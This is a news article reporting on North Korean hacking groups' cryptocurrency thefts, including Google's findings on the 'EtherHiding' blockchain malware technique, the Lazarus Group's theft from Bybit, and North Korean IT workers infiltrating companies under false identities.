Google: North Korean Hackers Attempted Cryptocurrency Theft, Funds Likely Used for Nuclear Weapons Development

Hidden Malware in Decentralized and Public Blockchains
Developers Tricked into Installing “Malicious Commands”
In February, 400,000 Ethereum Stolen from Bybit

Evidence has emerged indicating that North Korean hacker groups attempted to steal cryptocurrency, just eight months after breaching a supplier of Bybit, the world’s second-largest crypto exchange, in February and executing one of the largest cryptocurrency heists in history. As crypto theft has become a key source of foreign currency revenue for North Korea, the attackers are expanding their targets by infiltrating U.S. tech firms through fake employment and exploiting individual investors with weak security defenses. The funds stolen by these groups are estimated to amount to roughly 13% of North Korea’s GDP and are believed to be used primarily for the development of nuclear and other weapons of mass destruction.

Multi-Stage Malware Infection Process

On October 19 (local time), Google’s Threat Intelligence Group (GTIG) reported that the North Korea-linked threat group UNC5342 had been discovered attempting to steal cryptocurrency and collect sensitive information by deceiving developers through social engineering and tricking them into installing malicious code themselves. This new attack method, known as “EtherHiding,” hides malicious commands within blockchain transactions or smart contracts, which are then remotely executed. It marks the first known instance of a state-sponsored threat actor concealing malware through public, decentralized blockchains.

The attack compromised systems across multiple operating systems, including Windows, macOS, and Linux, through a multi-stage infection procedure. The attackers stored malicious commands on blockchain networks and retrieved them via read-only access, making it difficult to trace or block the command delivery. By leveraging the immutable nature of blockchains, they concealed command structures to evade traditional security detection systems while maintaining anonymity. Additionally, the attackers were able to dynamically modify the payload, allowing for long-term, persistent threat operations.

FBI Issues Wanted Notice for Lazarus Group Hackers

The Lazarus Group, one of North Korea’s most notorious hacker collectives alongside UNC5342, was responsible for the February breach of Bybit’s supplier that resulted in the theft of 401,000 Ethereum. The hackers exploited the process of transferring Ethereum from Bybit’s cold wallet to its hot wallet, deceiving the exchange into believing the transaction was legitimate, when in fact the funds were sent to a wallet controlled by Lazarus. According to blockchain security firm Elliptic, the incident ranks as the largest cryptocurrency theft ever recorded.

After the breach, Bybit offered a bounty and worked to prevent the stolen Ethereum from being liquidated. The exchange has since managed to recover and freeze $40 million in assets, but a significant portion is believed to have already been converted to cash. The BBC reported that Lazarus had stolen approximately $1.46 billion worth of cryptocurrency, with at least $300 million already laundered. Experts assess that given North Korea’s advanced hacking and money-laundering capabilities, recovering the remaining assets is highly unlikely.

Affiliated with North Korea’s Reconnaissance General Bureau, Lazarus first gained international notoriety in 2014 by hacking Sony Pictures in retaliation for a film satirizing Kim Jong-un. The group was also behind the 2016 Bangladesh Central Bank heist and the 2017 WannaCry ransomware attack, which infected over 200,000 computers across 150 countries. Park Jin-hyok, who led these operations, was placed on the FBI’s most wanted list in 2018. More recently, the group has been linked to the May Solana hack, in which $3.2 million was stolen.

$2 Billion Stolen from Individual Investors

As cryptocurrency theft becomes a major tool for circumventing international sanctions and generating foreign currency, North Korea’s attacks have expanded from corporations to individual investors. Wealthy individuals with weaker security protections have become prime targets. Blockchain cybersecurity firm TRM Labs estimates that in 2025 alone, North Korean hackers stole more than $2 billion worth of cryptocurrency from high-net-worth investors. This figure amounts to roughly 13% of North Korea’s GDP, and the funds are believed to be used for the development of nuclear and other weapons of mass destruction (WMDs).

There has also been a rise in cases where North Koreans infiltrate IT firms directly by securing employment. Some of these companies are said to include major global corporations. In June, the U.S. Department of Justice indicted four North Koreans who had obtained employment at American technology firms and systematically embezzled cryptocurrency. Using stolen personal identification data, they fabricated false identities to secure jobs, then siphoned off the firms’ managed crypto assets and laundered the proceeds. These individuals reportedly gained profits worth hundreds of thousands of dollars from their hacking operations.

The hackers’ activity has also expanded beyond the U.S. to Europe and Asia. GTIG warned, “North Korean hackers are increasingly disguising themselves as remote freelancers to infiltrate European firms,” adding, “North Korean workers can now be employed virtually anywhere in the world.” On October 2, Japan’s SBI Holdings reportedly suffered losses of $21 million due to a North Korean-linked crypto theft. SBI Holdings, one of Japan’s largest financial groups, had recorded an all-time high of $810 million in virtual asset division revenue during the second quarter.